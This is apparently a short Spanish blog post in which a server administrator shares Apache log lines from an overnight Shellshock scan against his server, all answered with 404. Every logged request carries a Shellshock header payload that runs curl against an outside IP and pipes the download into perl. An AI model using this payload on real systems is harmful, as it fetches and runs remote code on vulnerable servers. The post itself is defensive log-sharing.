Mas shellshock …

Otra vez que alguien se aburre y la toma con el pobre servidor. Menudo fin de semana … Esta vez escaneos buscando shellshock.


69.57.174.90 – – [03/Nov/2014:01:10:56 +0100] “GET /musicqueue.cgi HTTP/1.0” 404 436 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:51 +0100] “GET /parse_xml.cgi HTTP/1.0” 404 435 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:50 +0100] “GET /photo/manage.cgi HTTP/1.0” 404 438 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:23 +0100] “GET /upload.cgi HTTP/1.0” 404 432 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:18 +0100] “GET /webtools/bonsai/cvslog.cgi HTTP/1.0” 404 448 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:11 +0100] “GET /cgi-bin/w3mman2html.cgi HTTP/1.0” 404 445 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:08 +0100] “GET /cgi-bin/tree.php HTTP/1.0” 404 438 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:06 +0100] “GET /sys-cgi HTTP/1.0” 404 429 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:10:03 +0100] “GET /cgi-bin/firmwarecfg HTTP/1.0” 404 441 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:09:53 +0100] “GET /cgi-bin/status HTTP/1.0” 404 436 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:09:52 +0100] “GET /cgi-sys/suspendedpage.cgi HTTP/1.0” 404 447 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”
69.57.174.90 – – [03/Nov/2014:01:09:50 +0100] “GET /cgi-sys/ HTTP/1.0” 404 430 “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl” “() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl”

Y así unos cuantos miles mas durante toda la noche.

Un tío chungo de New-Jersey.

chungo jersey

Tiene pinta de maquina petada, un cpanel por defecto…

Y cuando se aburrió … se fue a otro sitio.

Comments are closed.